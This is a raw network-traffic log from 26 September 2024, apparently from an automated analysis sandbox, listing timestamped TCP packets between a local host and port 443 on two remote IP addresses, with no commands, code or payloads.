Sep 26, 2024 17:55:27.883737087 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.892096996 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892198086 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892254114 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.892277956 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892330885 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892369986 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.892373085 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892386913 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892426968 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.892729998 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892810106 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892848969 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892855883 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.892868996 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.892909050 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.893136978 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.899492979 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.899564981 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.899568081 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.899590015 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.899640083 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.899642944 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.899657011 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.899688959 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.899708986 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905010939 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905070066 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905095100 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.905112982 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905162096 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.905164957 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905178070 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905246973 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.905252934 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905481100 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905523062 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905528069 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.905534983 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905571938 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.905577898 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905793905 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905833960 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905841112 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.905846119 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.905884027 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.918955088 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919162035 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919212103 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919226885 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.919250965 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919286966 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.919294119 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919580936 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919616938 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919629097 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.919634104 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919676065 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.919792891 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.919995070 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.920047045 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.920053959 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923202038 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923250914 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923265934 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.923279047 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923324108 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.923432112 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923505068 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923542976 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.923548937 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923793077 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.923841000 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.923846960 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924038887 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924084902 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924088955 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.924099922 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924210072 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.924295902 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924367905 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924410105 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.924416065 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924557924 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924597025 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924608946 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.924614906 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.924664021 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.924787998 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.938400030 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.938457012 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.938504934 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.938529968 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.938575983 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.938688040 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.938761950 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.938806057 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.938815117 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.949621916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.949707031 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.949729919 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.949779034 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.949819088 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.949820995 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.949834108 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.949870110 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.949877024 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.950181961 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.950222969 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.950228930 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.950237989 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.950278044 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.950283051 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.950663090 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.950716019 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.950723886 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.962919950 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.963006973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.963032007 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.963047981 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.963063955 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.963095903 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.963288069 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.963344097 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.963356018 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.965194941 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.965240955 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.965276003 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.965293884 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.965301991 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.965325117 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.965341091 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.965399027 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.965440035 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.965446949 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.968046904 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.968089104 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.968122959 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.968137980 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.968193054 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.968199015 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.968250036 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.968291998 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.968297005 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.969841003 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.970180988 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.970211029 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.970558882 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.970977068 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.971076965 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.971187115 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.971218109 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.972738028 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.972795963 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.972820044 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.975488901 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.975557089 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.975575924 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.975843906 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.975886106 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.975889921 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.975899935 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.975941896 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.975994110 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.978796005 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.978852987 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.978872061 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.979217052 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.979259968 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.979306936 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.979326963 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.979480982 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.979535103 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.979979992 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.979993105 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.982793093 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.982827902 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.982922077 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983108997 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983143091 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983156919 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983177900 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983197927 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983293056 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983334064 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983338118 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983349085 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983392000 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983397007 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983655930 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983691931 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983695984 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983704090 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983737946 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983745098 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983808994 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.983850956 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.983856916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.985719919 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.985774994 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.985793114 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.990431070 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.990487099 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.990510941 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.990583897 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.990626097 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.990633965 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.995981932 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996021986 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996037006 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.996062040 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996107101 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.996141911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996221066 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996253967 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996258974 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.996267080 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996305943 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.996450901 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996517897 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996556997 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.996563911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996798038 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996831894 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996850014 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.996856928 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.996896982 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.009896994 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010037899 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010085106 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.010088921 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010109901 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010123014 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010152102 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010159969 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.010165930 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010229111 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.010286093 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.010293961 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010469913 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010716915 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010751963 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010763884 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.010771036 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010799885 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.010808945 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.010814905 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.011071920 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.011157036 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.011236906 CEST	49745	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.014183044 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014216900 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014242887 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.014260054 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014312983 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.014318943 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014357090 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014400005 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.014405966 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014729977 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014763117 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014786959 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.014791965 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014831066 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.014878988 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014938116 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014967918 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.014978886 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.014983892 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.015024900 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.015244007 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.015300035 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.015341997 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.015346050 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.015526056 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.015559912 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.015569925 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.015574932 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.015623093 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.029479980 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.029721975 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.029762983 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.029788971 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.029802084 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.029841900 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.029848099 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.029854059 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.029908895 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.031325102 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.040272951 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.040486097 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.040501118 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.040720940 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.040924072 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.040963888 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.040982008 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.040987015 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.041042089 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.041048050 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.041423082 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.041449070 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.041479111 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.041517019 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.041779995 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.041835070 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.041857004 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.041871071 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.042313099 CEST	49746	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.042319059 CEST	443	49746	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.055396080 CEST	443	49745	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.056797028 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.056898117 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.056926012 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.056957960 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.056972980 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.057024002 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.061564922 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.069730997 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.069761992 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.069783926 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.069792032 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.069840908 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.071273088 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.071322918 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.071417093 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.072068930 CEST	49752	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.072082996 CEST	443	49752	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.075423002 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.082524061 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.082551003 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.082576990 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.082585096 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.082626104 CEST	49736	443	192.168.2.16	142.250.186.132
